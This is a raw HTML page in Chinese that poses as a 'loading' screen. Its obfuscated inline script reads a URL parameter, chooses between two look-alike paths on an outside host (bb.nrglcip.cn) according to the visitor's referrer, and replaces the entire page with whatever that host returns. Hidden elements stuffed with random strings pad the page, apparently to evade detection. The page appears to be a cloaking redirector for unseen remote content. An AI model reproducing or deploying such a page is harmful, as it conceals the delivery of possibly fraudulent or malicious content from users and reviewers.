<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .KcgDxUgW8cd {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .KcgDxUgW8cd .Zck0y0j7 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .KcgDxUgW8cd .content {
            line-height: 50px;
            text-align: center
        }

        .KcgDxUgW8cd .img {
            width: 100%
        }

        .KcgDxUgW8cd .bmRELrdpm2 {
            text-align: center
        }

        .KcgDxUgW8cd .bmRELrdpm2 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .KcgDxUgW8cd .bmRELrdpm2 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .KcgDxUgW8cd .bmRELrdpm2 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .KcgDxUgW8cd .bmRELrdpm2 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .KcgDxUgW8cd .bmRELrdpm2 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .KcgDxUgW8cd .bmRELrdpm2 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .KcgDxUgW8cd .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function OpwLjBeDJ4A2(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var XgBcpr = OpwLjBeDJ4A2('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ XgBcpr +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ XgBcpr +".html?a=share";
		}
		
        SGu7lE=url+"#"+new Date().getTime();
        SGu7lE && function() {
            $.get(SGu7lE, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<div style='display:none'>rBGyBUiwLha1kt4u1zemKftLPLxC0mF7L7jQpy01hhYjIhl4GCTqcEh8sZc8JojUtt</div>
<div style='display:none'>rBGyBUiwLha1kt4u1zemKftLPLxC0mF7L7jQpy01hhYjIhl4GCTqcEh8sZc8JojUtt</div>
<h1 style='display:none' >fEg35zXtA2MCtRgPLMSPdm</h1>
<span style='display:none'>zUNP4wXyWpVTznl4hdIUPGZ5SocewSdaqPkI2eEUDinM0ymKpLvS</span>
<h1 style='display:none' >fEg35zXtA2MCtRgPLMSPdm</h1>
<a  href='#' style='display:none'>UWtlFxvgpg5HXrNSdMqfuyA6xbGA4BDYeQ42ovTzRjNubHygYvQMHJhiOm4xFYa5YTBLDT4tl5f1bDuxrTXGp7p6vD4rbUq</a><div class="KcgDxUgW8cd">
    <div class="Zck0y0j7">
        <div class="bmRELrdpm2">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>qMKLTDTaRtv5eXNDH1WuKfBTT1YL3tjFXJ4ccEuCQPpAtbfelbJZPItPQGke0j22O</p>
<span style='display:none'>MmRsY9seHbZeonWvCmyjiPfTkiR3Jk41faJv99</span>
<span style='display:none'>MmRsY9seHbZeonWvCmyjiPfTkiR3Jk41faJv99</span>
<img  src='' style='display:none'>
<p  style='display:none'>qMKLTDTaRtv5eXNDH1WuKfBTT1YL3tjFXJ4ccEuCQPpAtbfelbJZPItPQGke0j22O</p>
<h1 style='display:none' >aw1YXyDRbpaerrFGvYyQGTyBbLxqyOQKNmD1e1Ync2fcU3ezqIg9UNwtXIhGx5oGwnxU4pmojR6GGabOQpZwNL6mt1wjn3UZ5</h1>
<div style='display:none'>UNceAcpIr7Mmwk8xcdvTPF9QptRV2Ljea3NlkVCNdBZzQq2o2TFnWX75on2i5yxjhTC1BqFyLWWjYYLZ9Sy0</div>
<ul style='display:none' >YCh3IElcG9GE22tpBAq9PxDfeFXe86tu</ul>
<span style='display:none'>MmRsY9seHbZeonWvCmyjiPfTkiR3Jk41faJv99</span>
<h1 style='display:none' >aw1YXyDRbpaerrFGvYyQGTyBbLxqyOQKNmD1e1Ync2fcU3ezqIg9UNwtXIhGx5oGwnxU4pmojR6GGabOQpZwNL6mt1wjn3UZ5</h1></body>
</html>